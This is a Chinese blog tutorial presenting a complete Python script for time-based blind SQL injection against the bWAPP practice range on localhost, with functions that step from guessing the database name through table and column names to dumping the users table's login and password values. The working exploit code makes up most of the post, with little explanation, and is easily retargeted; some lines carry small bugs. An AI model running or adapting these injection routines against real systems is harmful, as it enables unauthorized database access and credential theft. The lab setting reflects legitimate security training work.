使用python脚本的时间盲注完整步骤

wutiangui2023-10-04 6:00

文章目录

一、获取数据库名称长度

测试环境是bwapp靶场 SQL Injection - Blind - Time-Based

python 复制代码 
import requests
import time

HEADER={
	"Cookie":"BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0"
}
BASE_URL="http://127.0.0.1:9004/sqli_15.php?"

def get_database_name_length(value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(database())={} and sleep(1) -- {}".format(value1, i, value2)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		#print(resp.content)
		if time.time()-start_time>1:
			print("数据库长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

databaselen = get_database_name_length("title", "&action=search") + 1

执行结果

tips:title=,&action=search需要使用burp抓包获得

--两边有空格

二、获取数据库名称

python 复制代码 
def get_database_name(len, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- {}".format(value1, i, j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER)
			if time.time()-start_time>2:
				print("{}:{}".format(i,j),chr(j))
				str+=(chr(j))
				break
	print("数据库名称为:",str)
	return str

执行语句:

database = get_database_name(databaselen,"title", "&action=search")

执行结果

三、获取表名总长度

python 复制代码 
def get_table_name_length(database, value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'), 1)) ={} and sleep(1) -- {}".format(value1, database,i, value2)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		if time.time()-start_time>1:
			print("表名总长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

tablelen = get_table_name_length(database,"title", "&action=search") + 1

执行结果:

四、获取表名

python 复制代码 
def get_table_name(len,database, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} and sleep(2) -- {}".format(value1, database, i,j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER)
			if time.time()-start_time>2:
				#print("{}:{}".format(i,j),chr(j))
				str+=(chr(j))
				break
		print("{}:".format(i),str)
	print("表名为:",str)
	return str

执行语句:

get_table_name(tablelen,database,"title", "&action=search")

执行结果:

,

五、获取指定表列名总长度

python 复制代码 
def get_column_name_length(database,table, value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1)) ={} and sleep(1) -- {}".format(value1, table,database,i, value1)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		if time.time()-start_time>1:
			print("列名总长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

columnlen = get_column_name_length(database, "users","title", "&action=search") + 1

执行结果:

六、获取指定表列名

python 复制代码 
def get_column_name(len,database, table, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1),{},1))={} and sleep(2) -- {}".format(value1, table, database, i,j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER),
			if time.time()-start_time>2:
				str+=(chr(j))
				break
		print("{}:".format(i),str)
	print("列名为:",str)
	return str

执行语句:

get_column_name(columnlen, database, "users","title", "&action=search")

执行结果:

七、获取指定表指定列的表内数据总长度

python 复制代码 
def get_data_name_length(table, username, password, value1, value2):
	count = 0
	for i in range(100):
		url=BASE_URL+"{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) from {}), 1)) ={} and sleep(1) -- {}".format(value1, username, password, table,i, value2)
		start_time = time.time()
		resp= requests.get(url,headers=HEADER)
		if time.time()-start_time>1:
			print("列数据总长度为:{}".format(i))
			count = i
			break
	return count

执行语句:

datalen = get_data_name_length("users", "login", "password","title", "&action=search") + 1

执行结果:

八、获取指定表指定列的表内数据

python 复制代码 
def get_data_name(len, table, username, password, value1, value2):
	str = ""
	for i in range(1,len):
		for j in range(127):
			url=BASE_URL+"{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) from {}),{},1))={} and sleep(2) -- {}".format(value1, username, password, table, i,j, value2)
			start_time = time.time()
			resp= requests.get(url,headers=HEADER),
			if time.time()-start_time>2:
				str+=(chr(j))
				break
		print("{}:".format(i),str)
	print("登录数据为:",str)
	return str

执行语句:

get_data_name(datalen, "users", "login", "password","title", "&action=search")

执行结果:
我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名

相关推荐
kakacc:3 分钟前
记录一次巧妙的SQL:一对多关联导致的 sum () 、count()等group函数重复计算问题
数据库·sql
心随雨下22 分钟前
Redis中Geospatial 实际应用指南
数据库·redis·分布式·缓存
黑夜管理员25 分钟前
Sql Server安装报错“服务没有及时响应启动或控制请求”
数据库·sql server
NineData1 小时前
NineData云原生智能数据管理平台新功能发布|2025年9月版
数据库·云原生·devops·ninedata·数据库迁移·数据复制·风险sql管控
junnhwan1 小时前
【苍穹外卖笔记】Day04--套餐管理模块
java·数据库·spring boot·后端·苍穹外卖·crud
川石课堂软件测试2 小时前
全链路Controller压测负载均衡
android·运维·开发语言·python·mysql·adb·负载均衡
一枚正在学习的小白2 小时前
PG数据文件位置迁移
linux·运维·服务器·数据库
喜欢吃豆2 小时前
微调高级推理大模型(COT)的综合指南:从理论到实践
人工智能·python·语言模型·大模型·微调·强化学习·推理模型
真的想不出名儿2 小时前
上传头像到腾讯云对象存储-前端基于antdv
java·数据库·腾讯云
Dreams_l2 小时前
初识redis(分布式系统, redis的特性, 基本命令)
数据库·redis·缓存
热门推荐
01BongoCat - 跨平台键盘猫动画工具02两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答03智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践04GitHub 镜像站点05UV安装并设置国内源06Linux下V2Ray安装配置指南07GitLab 零基础入门指南:从安装到项目管理全流程082025羊城杯网络安全大赛 wp09Cursor Plan Mode:AI 终于知道先想后做了10Spring Boot 实现微信登录,So Easy !